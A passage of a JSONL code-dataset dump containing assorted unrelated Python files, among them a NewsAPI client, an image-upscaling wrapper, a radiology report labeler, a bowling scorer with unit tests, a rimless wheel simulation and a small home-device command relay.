!=1):\n if p > q:\n seq_ch.insert(0,'right_child')\n p = p - q\n elif p < q:\n seq_ch.insert(0,'left_child')\n q = q - p\n\n index = 1\n while(len(seq_ch)):\n if seq_ch[0] == 'left_child':\n index = 2*index\n seq_ch.pop(0)\n elif seq_ch[0] =='right_child':\n index = 2*index + 1\n seq_ch.pop(0)\n print(inp[0],index)\n\n\n\n","sub_path":"arationalsequence.py","file_name":"arationalsequence.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"317069244","text":"import logging\nfrom functools import partial\n\nimport requests\n\nfrom newsapi.newsapi_auth import NewsApiAuth\nfrom newsapi.constants import COUNTRIES, CATEGORIES, LANGUAGES\n\n\nLOGGER = logging.getLogger()\n\n\nclass NewsApi(object):\n \"\"\"Client for NewsApi.org.\n\n An API Key is required, get a free one at https://newsapi.org.\n\n Future\n ======\n\n In the event of API URL, supported languages, countries, or categories\n changes the defaults can be overridden. To add to these constants, import\n them then append to the list and include in the NewsApiClient instancing.\n \"\"\"\n def __init__(self, api_key: str, api_url='https://newsapi.org/v2/',\n timeout=30, countries=COUNTRIES,\n categories=CATEGORIES, languages=LANGUAGES) -> None:\n self._url = api_url.rstrip('/')\n self._get = partial(requests.get,\n auth=NewsApiAuth(api_key=api_key),\n timeout=timeout)\n self._COUNTRIES = countries\n self._CATEGORIES = categories\n self._LANGUAGES = languages\n\n def _validate_country(self, country: str) -> bool:\n if not country:\n return True\n else:\n assert country in self._COUNTRIES, \"Invalid Country specified.\"\n\n def _validate_language(self, language: str) -> bool:\n if not language:\n return True\n else:\n assert language in self._LANGUAGES, \"Invalid Languaged specified.\"\n\n def _validate_category(self, category: str) -> bool:\n if not category:\n return True\n else:\n assert category in self._CATEGORIES, \"Invalid Category specified.\"\n\n def top_headlines(self, q: list=None, sources: list=None,\n language: str=None, country: str=None,\n category: str=None, page_size: int=None, page: int=None):\n \"\"\"Returns live top and breaking headlines for a country, specific\n category in a country, single source, or multiple sources..\n Optional parameters:\n q - return headlines w/ specified keywords.\n sources - return headlines of news sources! some Valid values are:\n 'bbc-news', 'fox-news', for more use NewsApiClient.sources()\n language - 2-letter ISO-639-1 code of the language you want to get\n headlines for. Valid values are:\n ar de en es fr he it nl no pt ru se\n ud zh\n country: The 2-letter ISO 3166-1 code of the country you want\n to get headlines for.\n Valid values are:\n\n ae ar at au be bg br ca ch cn co\n cu cz de eg fr gb gr hk hu id ie\n il in it jp kr lt lv ma mx my ng\n nl no nz ph pl pt ro rs ru sa se\n sg si sk th tr tw ua us\n\n category - The category you want to get headlines for. Valid values:\n 'business','entertainment','general','health','science'\n ,'sports','technology'\n page_size - The number of results to return per page (request).\n 20 is the default, 100 is the maximum.\n page - Use this to page through the results if the total results found\n is greater than the page size.\n \"\"\"\n self._validate_country(country)\n self._validate_language(language)\n self._validate_category(category)\n # Define Payload\n payload = {}\n payload['q'] = ','.join(q) if sources else None\n payload['sources'] = ','.join(sources) if sources else None\n payload['language'] = language\n payload['country'] = country\n payload['category'] = category\n payload['pageSize'] = page_size\n payload['page'] = page\n\n # Send Request\n LOGGER.debug(\"Params %s\", payload)\n return self._get(self._url + '/top-headlines', params=payload).json()\n\n def everything(self, q: list=None, sources: list=None, domains: list=None,\n from_parameter: str=None, to: str=None, language: str=None,\n sort_by: str=None, page: int=None,\n page_size: int=None) -> str:\n \"\"\"Retrieve all headlines with optional filtering.\n Optional parameters:\n\n language - The 2-letter ISO-639-1 code of the language you want\n to get headlines for.\n Valid values:\n 'ar','de','en','es','fr','he','it','nl','no','pt','ru','se','ud','zh'\n\n country - The 2-letter ISO 3166-1 code of the country you want to get\n headlines from.\n Valid values are:\n\n ae ar at au be bg br ca ch cn co\n cu cz de eg fr gb gr hk hu id ie\n il in it jp kr lt lv ma mx my ng\n nl no nz ph pl pt ro rs ru sa se\n sg si sk th tr tw ua us\n\n category - The category you want to get headlines for!\n Valid values:\n 'business','entertainment','general','health','science','sports',\n 'technology'\n \"\"\"\n self._validate_language(language)\n\n # Define Payload\n payload = {}\n payload['q'] = ','.join(q) if q else None\n payload['sources'] = ','.join(sources) if sources else None\n payload['domains'] = ','.join(domains) if domains else None\n payload['from'] = from_parameter\n payload['to'] = to\n payload['language'] = ','.join(language) if language else None\n payload['sortBy'] = sort_by\n payload['page'] = page\n payload['pageSize'] = page_size\n\n # Send Request\n LOGGER.debug(\"Params %s\", payload)\n return self._get(self._url + '/everything', params=payload).json()\n\n def sources(self, category: str=None, language: str=None,\n country: str=None) -> str:\n \"\"\"Retrieve list of source names optionally filtering by category and\n language.\n \"\"\"\n self._validate_country(country)\n self._validate_language(language)\n self._validate_category(category)\n\n # Define Payload\n payload = {}\n payload['category'] = category\n payload['language'] = language\n payload['country'] = country\n\n # Send Request\n LOGGER.debug(\"Params %s\", payload)\n return self._get(self._url + '/sources', params=payload).json()\n","sub_path":"newsapi/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12422247","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom PIL import Image\nimport os\nimport sys\nimport time\nimport subprocess\nimport shutil\n\nfrom common import macro\nfrom common import utils\n\n\ndef backupSmallImages(path):\n bpath = os.path.join(path, macro.BACKUP_NAME)\n for fname in os.listdir(path):\n filename = os.path.join(path, fname)\n if not utils.isImage(filename):\n continue\n with Image.open(filename) as img:\n width = img.width\n height = img.height\n if width < macro.STAND_WIDTH and height < macro.STAND_HEIGHT:\n os.makedirs(bpath, exist_ok=True)\n shutil.move(filename, os.path.join(bpath, fname))\n\n\ndef filterUpscaledImages(path):\n bpath = os.path.join(path, macro.BACKUP_NAME)\n tpath = os.path.join(path, macro.TMP_NAME)\n if not os.path.exists(bpath) or not os.path.exists(tpath):\n return\n largeImages = os.listdir(tpath)\n for damagedImage in largeImages[-3:]:\n os.remove(os.path.join(tpath, damagedImage))\n applyLargeImages(path)\n largeImages = largeImages[:-3]\n\n for largeImage in largeImages:\n fname, _ = os.path.splitext(largeImage)\n os.remove(os.path.join(bpath, fname))\n\n\ndef applyLargeImages(path):\n tpath = os.path.join(path, macro.TMP_NAME)\n if not os.path.exists(tpath):\n return\n for fname in os.listdir(tpath):\n filename = os.path.join(tpath, fname)\n originalName, extend = os.path.splitext(fname)\n rawName, _ = os.path.splitext(originalName)\n os.rename(filename, os.path.join(path, rawName + extend))\n\n\ndef clear(path):\n applyLargeImages(path)\n bpath = os.path.join(path, macro.BACKUP_NAME)\n tpath = os.path.join(path, macro.TMP_NAME)\n utils.remove(bpath)\n utils.remove(tpath)\n\n\ndef upscaleImages(path):\n if not sys.platform.startswith('win'):\n return\n\n backupSmallImages(path)\n filterUpscaledImages(path)\n\n bpath = os.path.join(path, macro.BACKUP_NAME)\n tasks = os.listdir(bpath) if os.path.exists(bpath) else []\n if not tasks:\n clear(path)\n return\n\n tpath = os.path.join(path, macro.TMP_NAME)\n os.makedirs(tpath, exist_ok=True)\n\n waifu2xPath = os.path.join('tools', 'waifu2x-ncnn-vulkan')\n cmd = [\n os.path.join(waifu2xPath, 'waifu2x-ncnn-vulkan.exe'), '-t', '64', '-i',\n bpath, '-o', tpath\n ]\n p = subprocess.Popen(cmd, cwd=waifu2xPath)\n\n yield len(tasks)\n\n previsouNum = 0\n while previsouNum < len(tasks):\n time.sleep(5) # second\n finishNum = len(os.listdir(tpath))\n for index in range(previsouNum, finishNum):\n yield 'upscaling: ' + os.path.join(path, tasks[index])\n previsouNum = finishNum\n\n p.wait()\n\n clear(path)\n","sub_path":"tools/upscaler.py","file_name":"upscaler.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"139912517","text":"#main.py\n#Copyright (c) 2020 Rachel Lea Ballantyne Draelos\n\n#MIT License\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n#The above copyright notice and this permission notice shall be included in all\n#copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE\n\nimport os\nimport copy\nimport pickle\nimport datetime\nimport pandas as pd\nimport numpy as np\n\n#from sentence_classifier import ClassifySentences\nfrom sentence_rules import *\nimport term_search\nimport visualizations\n\ndef run_SARLE_Rules_demo():\n #SARLE-Rules\n #Apply rule-based methods. There are 3 options: 'duke_ct' applies the rules\n #developed for CT scans to the CXR data, just for demo purposes since the\n #CT data could not be made public. 'cxr_amb_neg' applies the rules\n #developed for chest x-rays that consider ambiguous findings negative.\n #'cxr_amb_pos' applies the rules developed for chest x-rays that consider\n #ambiguous findings positive.\n #Here we'll just apply all the rule based methods in sequence,\n #to demo all of them:\n for rules_to_use in ['duke_ct', 'cxr_amb_neg', 'cxr_amb_pos']:\n generate_labels(method='rules',rules_to_use=rules_to_use)\n\ndef run_SARLE_Hybrid_demo():\n #SARLE-Hybrid\n #Apply hybrid approach where the Fasttext classifier is used to distinguish\n #normal and abnormal sentences before the term search.\n #Note that Fasttext is only available on Linux.\n generate_labels(method='hybrid', rules_to_use='')\n \ndef generate_labels(method, rules_to_use):\n \"\"\"Generate labels for the radiology reports using the specified , either\n 'hybrid' for a Fasttext sentence classifier followed by the term search, or\n 'rules' for a rule-based phrase classifier followed by the term search\"\"\"\n assert method in ['hybrid','rules']\n assert rules_to_use in ['duke_ct', 'cxr_amb_neg', 'cxr_amb_pos','']\n if method=='hybrid': assert rules_to_use==''\n \n #Note that to run on CT data, dataset = 'duke_ct'. However CT data is\n #not public, so 'openi_cxr' is the only dataset option here.\n dataset = 'openi_cxr'\n \n #For the openi_cxr data set, there is no 'predict set'\n run_predict=False\n #For the Duke CT data, the predict set consists of the many thousands of\n #reports on which we need to apply the labeler to get a volume ground truth.\n \n #Make results directory\n if not os.path.isdir('results'):\n os.mkdir('results')\n if len(rules_to_use)>0:\n results_dir = os.path.join('results',datetime.datetime.today().strftime('%Y-%m-%d')+'_'+dataset+'_'+method+'_'+rules_to_use)\n else:\n results_dir = os.path.join('results',datetime.datetime.today().strftime('%Y-%m-%d')+'_'+dataset+'_'+method)\n if not os.path.isdir(results_dir):\n os.mkdir(results_dir)\n \n #Extracting Abnormal Sentences (Fasttext) or Abnormal Phrases (Rules):\n if method == 'hybrid': #Sentence Classifier, Fasttext approach\n sent_class_dir = os.path.join(results_dir, '0_sentences')\n if not os.path.isdir(sent_class_dir):\n os.mkdir(sent_class_dir)\n #Safra Fasttext \n #First, just get results to report (but not to use downstream):\n ClassifySentences(dataset,sent_class_dir,'trainfilt_testfilt').run_all()\n ClassifySentences(dataset,sent_class_dir,'trainall_testfilt').run_all()\n #Now get results to report AND use downstream:\n m = ClassifySentences(dataset,sent_class_dir,'trainall_testall')\n m.run_all()\n elif method == 'rules': #Rule-based approach\n m = ApplyRules(dataset, rules_to_use)\n m.run_all()\n \n #Term Search\n term_search_dir = os.path.join(results_dir, '1_term_search')\n if not os.path.isdir(term_search_dir):\n os.mkdir(term_search_dir)\n term_search.RadLabel(dataset, term_search_dir, 'train', m.train_merged)\n term_search.RadLabel(dataset, term_search_dir, 'test', m.test_merged)\n if run_predict:\n term_search.RadLabel(dataset, term_search_dir, 'predict', m.predict_merged)\n if dataset == 'duke_ct' and run_predict is True:\n term_search.combine_imgtrain_files(term_search_dir)\n \n #Visualizations\n generate_visualizations(dataset, results_dir)\n print('Done')\n\ndef generate_visualizations(dataset, results_dir):\n \"\"\"Make visualizations that summarize the extracted labels\"\"\"\n #Results dirs for visualizations\n viz_dir = os.path.join(results_dir, '2_visualizations')\n if not os.path.isdir(viz_dir):\n os.mkdir(viz_dir)\n #Sentence Histograms for the notetrain set only\n visualizations.RepeatedSentenceHistograms(dataset, viz_dir)\n \nif __name__=='__main__':\n run_SARLE_Rules_demo()\n #run_SARLE_Hybrid_demo()\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"386458365","text":"from abc import ABCMeta, abstractmethod\nimport unittest\n\n\nclass StrikeError(Exception):\n def __str__(self):\n return 'Некорректные данные. Strike может быть только первым броском фрейма'\n\n\nclass SpareError(Exception):\n def __str__(self):\n return 'Некорректные данные. Spare может быть только вторым броском фрейма'\n\n\nclass FrameCountError(Exception):\n def __str__(self):\n return 'Игра состоит более чем из 10 фреймов'\n\n\nclass TotalScoreError(Exception):\n def __str__(self):\n return 'Некорректные данные. Сумма двух бросков не может превышать 10 очков'\n\n\nclass BadStringError(Exception):\n def __init__(self, string):\n super().__init__()\n self.string = string\n\n def __str__(self):\n return f'Некорректный символ в данных {self.string}. Допустимо использовать Цифры, \\\"-\\\", \\\"/\\\", \\\"Х\\\"'\n\n\nclass UnfinishedFrameWarning(Exception):\n\n def __str__(self):\n return 'Игра закончена на недоигранном фрейме'\n\n\nclass NoSpareWarning(Exception):\n def __init__(self, prev_score, score):\n super().__init__()\n self.prev_score = prev_score\n self.score = score\n\n def __str__(self):\n return f'Некорректные данные. Записано {self.prev_score}{self.score}, ожидается {self.prev_score}/'\n\n\nclass State(metaclass=ABCMeta):\n\n @abstractmethod\n def throw_calculation(self, string, prev_score, frame_count, game_result, string_count, international):\n \"\"\"Расчет очков\"\"\"\n\n\nclass FirstThrow(State):\n def throw_calculation(self, string, prev_score, frame_count, game_result, string_count, international):\n bonus = 0\n if string == 'Х' or string == 'X':\n if international:\n score = 10\n try:\n if game_result[string_count + 1] == '/':\n bonus = 10\n else:\n for i, bonus_string in enumerate(game_result[string_count: string_count + 2]):\n if bonus_string == 'Х' or bonus_string == 'X':\n bonus += 10\n elif bonus_string.isdigit():\n bonus += int(bonus_string)\n except IndexError:\n bonus = 0\n else:\n score = 20\n frame_count += 1\n game_state = FirstThrow()\n return score, game_state, frame_count, bonus\n elif string == '/':\n raise SpareError()\n elif string == '-':\n score = 0\n elif string.isdigit():\n score = int(string)\n else:\n raise BadStringError(string)\n frame_count += 1\n game_state = SecondThrow()\n return score, game_state, frame_count, bonus\n\n\nclass SecondThrow(State):\n def throw_calculation(self, string, prev_score, frame_count, game_result, string_count, international):\n bonus = 0\n if string == 'Х' or string == 'X':\n raise StrikeError()\n elif string == '/':\n if international:\n score = 10 - prev_score\n try:\n bonus_string = game_result[string_count]\n if bonus_string == 'Х' or bonus_string == 'X':\n bonus = 10\n elif bonus_string.isdigit():\n bonus = int(bonus_string)\n except IndexError:\n bonus = 0\n else:\n score = 15 - prev_score\n elif string == '-':\n score = 0\n elif string.isdigit():\n score = int(string)\n if prev_score + score > 10:\n raise TotalScoreError()\n if prev_score + score == 10:\n raise NoSpareWarning(prev_score, score)\n else:\n raise BadStringError(string)\n game_state = FirstThrow()\n return score, game_state, frame_count, bonus\n\n\ndef get_score(game_result, international=True):\n game_score = prev_score = frame_count = string_count = bonus = 0\n game_state = FirstThrow()\n for string in game_result:\n string_count += 1\n game_score += bonus\n score, game_state, frame_count, bonus = game_state.throw_calculation(string, prev_score, frame_count,\n game_result, string_count, international)\n game_score += score\n prev_score = score\n if frame_count > 10:\n raise FrameCountError()\n if isinstance(game_state, SecondThrow):\n raise UnfinishedFrameWarning()\n # print(f'Количество очков для результатов: {game_result} - {game_score}, количество фреймов {frame_count} ')\n # print('===============================================================================')\n return game_score\n\n\nclass ScoreTests(unittest.TestCase):\n\n def test_short_game(self):\n self.assertEqual(get_score('Х4/34-4', international=False), 46)\n\n def test_normal_game(self):\n self.assertEqual(get_score('Х4/34-452Х-/729---', international=False), 106)\n\n def test_short_game_international(self):\n self.assertEqual(get_score('ХXX347/21'), 92)\n\n def test_normal_game_international(self):\n self.assertEqual(get_score('ХXX347/21XXX5/'), 177)\n\n def test_BadStringError(self):\n self.assertRaises(BadStringError, get_score, '141/FA457X')\n\n def test_FrameCountError(self):\n self.assertRaises(FrameCountError, get_score, 'ХХХХХХХХХ111')\n\n def test_StrikeError(self):\n self.assertRaises(StrikeError, get_score, '1ХХХХХХХХХХ')\n\n def test_SpareError(self):\n self.assertRaises(SpareError, get_score, 'ХХХХХХХХХ/1')\n\n def test_TotalScoreError(self):\n self.assertRaises(TotalScoreError, get_score, 'ХХХХХХХХХ56')\n\n def test_NoSpareWarning(self):\n self.assertRaises(NoSpareWarning, get_score, 'ХХХХХХХХХ55')\n\n def test_UnfinishedFrameWarning(self):\n self.assertRaises(UnfinishedFrameWarning, get_score, 'ХХХХХХХХХ1')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"lesson_014/bowling.py","file_name":"bowling.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"381409778","text":"#!/usr/bin/env python\n#-*- encoding:UTF-8 -*-\n\nimport urllib2\nimport os, re\n\nurl = 'http://www.java.com/pt_BR/download/manual.jsp'\nsite = urllib2.urlopen(url)\nhtml = site.readlines()\n\ndef java():\n\turl = 'http://www.java.com/pt_BR/download/manual.jsp' \n\tsite = urllib2.urlopen(url)\n\thtml = site.readlines()\n\tfor line in html:\n\t\tif \"Version\" in line:\n\t\t\tm = re.sub(\"<.*?>\",\"\",line)\n\t\t\tm = m.strip()\n\t\t\tm = re.split('[a-z]+', m, flags=re.IGNORECASE)\n\t\t\tversao = str(m[2]).strip()\n\t\t\tupdate = str(m[3]).strip()\n\treturn versao, update\n\n\nfor line in html:\n\t\tif \"Linux rpm pt JRE\" in line:\n\t\t\trpm = line\n\t\t\tbreak\n\t\t\t\nrpm = str(re.split('[a-z]+', rpm, flags=re.IGNORECASE))\nrpm = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",rpm)\nrpm = rpm.split()\n\nrpm = str(rpm[1])\t\n#print rpm\n\nfor line in html:\n\t\tif \"Linux pt JRE\" in line:\n\t\t\ttar = line\n\t\t\tbreak\n\t\t\t\n#rpm = rpm.strip()\t\t\t\ntar = str(re.split('[a-z]+', tar, flags=re.IGNORECASE))\ntar = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",tar)\ntar = tar.split()\n\ntar = str(tar[1])\n#print tar\n\nfor line in html:\n\t\tif \"Linux x64 pt JRE\" in line:\n\t\t\tx64 = line\n\t\t\tbreak\n\nx64 = str(re.split('[a-z]+', x64, flags=re.IGNORECASE))\nx64 = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",x64)\nx64 = x64.split()\n\nx64 = str(x64[2])\n\n#print x64\n\nfor line in html:\n\t\tif \"Linux x64-rpm pt JRE\" in line:\n\t\t\tx64rpm = line\n\t\t\tbreak\n\nx64rpm = str(re.split('[a-z]+', x64rpm, flags=re.IGNORECASE))\nx64rpm = re.sub(\"[<,=,:,//,?,\" \",),{,},;,_,>rn,(,..'\\\\','\\\"']\",\"\",x64rpm)\nx64rpm = x64rpm.split()\n\nx64rpm = str(x64rpm[2])\n#print x64rpm\n\n#.:.\n","sub_path":"version_java.py","file_name":"version_java.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"552030020","text":"def crearmatriz():\n listaa = []\n fila = int(input())\n columna = int(input())\n if fila > 0 and columna > 0: \n for i in range(fila):\n listaa.append([])\n for j in range(columna):\n n = int(input())\n listaa[i].append(n)\n else: \n print('Error')\n return listaa\n\ndef main():\n matriz = crearmatriz()\n listaa_col = []\n if len(matriz) > 0:\n for i in range(len(matriz[0])):\n count = 0\n for j in range(len(matriz)):\n count += matriz[j][i] \n listaa_col.append(count)\n print(listaa_col)\nif __name__=='__main__':\n main()\n\n","sub_path":"assignments/15SumaColumnas/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438292637","text":"import argparse\nimport math\nimport numpy as np\n\nfrom pydrake.all import (DiagramBuilder,\n FindResourceOrThrow,\n FloatingBaseType,\n Isometry3,\n RigidBodyTree,\n Simulator,\n VisualElement)\nfrom pydrake.attic.multibody.shapes import Box\nfrom pydrake.examples.rimless_wheel import (RimlessWheel, RimlessWheelParams)\nfrom underactuated import (PlanarRigidBodyVisualizer)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-T\", \"--duration\",\n type=float,\n help=\"Duration to run sim.\",\n default=10.0)\nparser.add_argument(\"-Q\", \"--initial_angle\",\n type=float,\n help=\"Initial angle of the stance leg (in radians).\",\n default=0.0)\nparser.add_argument(\"-V\", \"--initial_angular_velocity\",\n type=float,\n help=\"Initial angular velocity of the stance leg \"\n \"(in radians/sec).\",\n default=5.0)\nparser.add_argument(\"-S\", \"--slope\", type=float,\n help=\"Ramp angle (in radians)\",\n default=0.08)\nargs = parser.parse_args()\n\ntree = RigidBodyTree(FindResourceOrThrow(\n \"drake/examples/rimless_wheel/RimlessWheel.urdf\"),\n FloatingBaseType.kRollPitchYaw)\nparams = RimlessWheelParams()\nparams.set_slope(args.slope)\nR = np.identity(3)\nR[0, 0] = math.cos(params.slope())\nR[0, 2] = math.sin(params.slope())\nR[2, 0] = -math.sin(params.slope())\nR[2, 2] = math.cos(params.slope())\nX = Isometry3(rotation=R, translation=[0, 0, -5.])\ncolor = np.array([0.9297, 0.7930, 0.6758, 1])\ntree.world().AddVisualElement(VisualElement(Box([100., 1., 10.]), X, color))\ntree.compile()\n\nbuilder = DiagramBuilder()\nrimless_wheel = builder.AddSystem(RimlessWheel())\n\nvisualizer = builder.AddSystem(PlanarRigidBodyVisualizer(tree,\n xlim=[-8., 8.],\n ylim=[-2., 3.],\n figsize_multiplier=3))\nbuilder.Connect(rimless_wheel.get_output_port(1), visualizer.get_input_port(0))\n\ndiagram = builder.Build()\nsimulator = Simulator(diagram)\nsimulator.set_target_realtime_rate(1.0)\n\ncontext = simulator.get_mutable_context()\ndiagram.Publish(context) # draw once to get the window open\ndiagram.GetMutableSubsystemContext(\n rimless_wheel, context).get_numeric_parameter(0).set_slope(args.slope)\ncontext.SetAccuracy(1e-4)\ncontext.SetContinuousState([args.initial_angle, args.initial_angular_velocity])\n\nsimulator.AdvanceTo(args.duration)\n","sub_path":"src/rimless_wheel/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127589056","text":"import sys, os, docutils\n\nproject = 'DyND'\ncopyright = '2016, DyND Developers'\nversion = 'XYZ' # RELEASE_VERSION\nrelease = 'XYZ'\n\nprimary_domain = 'c'\n\nextensions = ['sphinx.ext.ifconfig']\nsource_suffix = '.rst'\nmaster_doc = 'index'\ntemplates_path = ['_templates']\nadd_function_parentheses = False\npygments_style = 'sphinx'\n\nhtml_title = 'DyND-Datashape'\nhtml_logo = '_static/dynd_logo_resized.png'\n#html_favicon = None\nhtml_static_path = ['_static']\nhtml_style = 'dynd-doc.css'\nhtml_domain_indices = False\nhtml_use_index = False\nhtml_show_sourcelink = False\nhtml_add_permalinks = \"\"\nhtml_copy_source = False\nhtml_sidebars = {\n '**': ['localtoc.html'],\n 'index': ['dynd-side.html'],\n 'download': [],\n}\n\ndef setup(app):\n app.add_crossref_type('topic', 'topic', 'single: %s',\n docutils.nodes.strong)\n\n\n\n","sub_path":"datashape/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"427342443","text":"#!/usr/bin/python\r\n# -*- coding:utf-8 -*- \r\n\r\nimport json\r\nimport time\r\nimport requests\r\n\r\n\r\ndef analyze(sentence):\r\n f = open('words.json', encoding='utf-8')\r\n m = open('machines.json')\r\n # dat = f.read()\r\n dat = '''{\"actions\": {\"关\": \"off\", \"开\": \"on\"}, \"devices\": {\"门\": [2, \"2\"], \"灯\": [1, \"1\"]}}'''\r\n # dat = dat.decode('gbk').encode('utf-8')\r\n # dat = dat.encode('utf-8').decode('gbk')\r\n print(dat)\r\n # if dat.startswith(u'\\ufeff'):\r\n # dat = dat.encode('utf8')[3:].decode('utf8')\r\n\r\n # di = json.loads(dat)\r\n di = {\"actions\": {\"关\": \"off\", \"开\": \"on\"}, \"devices\": {\"门\": [2, \"2\"], \"灯\": [1, \"1\"]}}\r\n # dat = m.read()\r\n # dat = dat.decode().encode('utf-8')\r\n # ma = json.loads(dat)\r\n ma = {\"1\": \"192.168.1.101\", \"2\": \"192.168.1.101\"}\r\n machines = []\r\n actions = []\r\n for d in di['devices']:\r\n machines.append(d)\r\n for d in di['actions']:\r\n actions.append(d)\r\n m.close()\r\n f.close()\r\n\r\n #将要发送给分机的数据\r\n send = {'machine':None,'device':None,'action':None}\r\n #判断动词(actions)\r\n for i in actions:\r\n if i in sentence:\r\n send['action'] = di['actions'][i]\r\n #判断设备\r\n for i in machines:\r\n if i in sentence:\r\n send['device'] = di['devices'][i][0]\r\n send['machine'] = ma[di['devices'][i][1]]\r\n if send['machine'] == None or send['device'] == None or send['action'] == None:\r\n send = None\r\n return send\r\n\r\n\r\nhost = 'http://192.168.1.101:8081'\r\n\r\n\r\ndef url_for(s):\r\n if s[0] == '/':\r\n return host + s\r\n else:\r\n return host + '/' + s\r\n\r\n\r\ndef post_data(url, prames):\r\n res = ''\r\n txt = '------WebKitFormBoundary7MA4YWxkTrZu0gW'\r\n for d in prames:\r\n res = res + txt + '\\r\\nContent-Disposition: form-data; name=\\\"' + d + '\\\"\\r\\n\\r\\n' + str(prames[d]) + '\\r\\n'\r\n res = res + txt + '--'\r\n headers = {'content-type': \"multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\", 'Cache-Control': \"no-cache\"}\r\n response = requests.request(\"POST\", url, data=res, headers=headers)\r\n return response.text\r\n\r\n\r\ndid = 0\r\ntoken = ''\r\nform = {}\r\n\r\n\r\ndef init():\r\n global did, token, form\r\n # 先注册一个设备,获取设备id\r\n did = 1\r\n\r\n # 获取token\r\n form = {'did': did}\r\n token = post_data(url_for('/get_token'), form)\r\n\r\n print(token)\r\n\r\n # 发送心跳\r\n form['token'] = token\r\n print(post_data(url_for('/beat'), form))\r\n\r\n '''\r\n # 发送数据给设备2\r\n data = 'Data'\r\n dest = '2'\r\n form['dest'] = dest\r\n form['data'] = data\r\n tid = post_data(url_for('/command_new'), form)\r\n print(tid)\r\n form['tid'] = tid\r\n '''\r\n\r\n\r\n#发送一个从字典转换来的str\r\n# PORT = 10492\r\n#端口\r\ndef send_to(send):\r\n '''\r\n import socket\r\n import json\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((send['machine'], PORT))\r\n s.send(json.dumps(send).encode('utf-8'))\r\n s.close()'''\r\n global did, token, form\r\n data = json.dumps(send)\r\n # 发送数据给设备2\r\n dest = '2'\r\n form['dest'] = dest\r\n form['data'] = data\r\n tid = post_data(url_for('/command_new'), form)\r\n print(tid)\r\n form['tid'] = tid\r\n print(form)\r\n tries = 100\r\n while tries > 0:\r\n res = post_data(url_for('/command_task_stat'), form)\r\n print('Waiting...\\tres =', res)\r\n if res == \"FINISH\":\r\n break\r\n tries = tries - 1\r\n time.sleep(1)\r\n if tries < 0:\r\n print(\"Time Out.\")\r\n post_data(url_for('/command_finish'), form)\r\n return\r\n data = post_data(url_for('/command_finish'), form)\r\n print(data)\r\n\r\n print('Finish task.')\r\n\r\n\r\n \r\ndef main(words):\r\n #words = '关灯...'\r\n #words = words.decode('gbk').encode('utf-8')\r\n #words = words.decode('utf-8')\r\n print(words)\r\n send = analyze(words)\r\n print(\"send\", send)\r\n if send != None:\r\n send_to(send)\r\n","sub_path":"Driver1/manege.py","file_name":"manege.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"135772520","text":"from fractions import Fraction\nfrom collections import Counter\nfrom typing import List\n\n\nclass Solution:\n def interchangeableRectangles(self, rectangles: List[List[int]]) -> int:\n cnt = Counter()\n for w, h in rectangles:\n cnt[Fraction(w, h)] += 1\n ans = 0\n for value in cnt.values():\n ans += value * (value - 1) // 2\n return ans\n","sub_path":"python/cache/5868. 可互换矩形的组数.py","file_name":"5868. 可互换矩形的组数.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"375812385","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef rplot(x,y,color):\n new_x, new_y = zip(*sorted(zip(x, y)))\n plt.plot(new_x, new_y, color+'--')\n plt.plot(new_x, new_y, color+'o')\n \n'''#1) Fizikinis 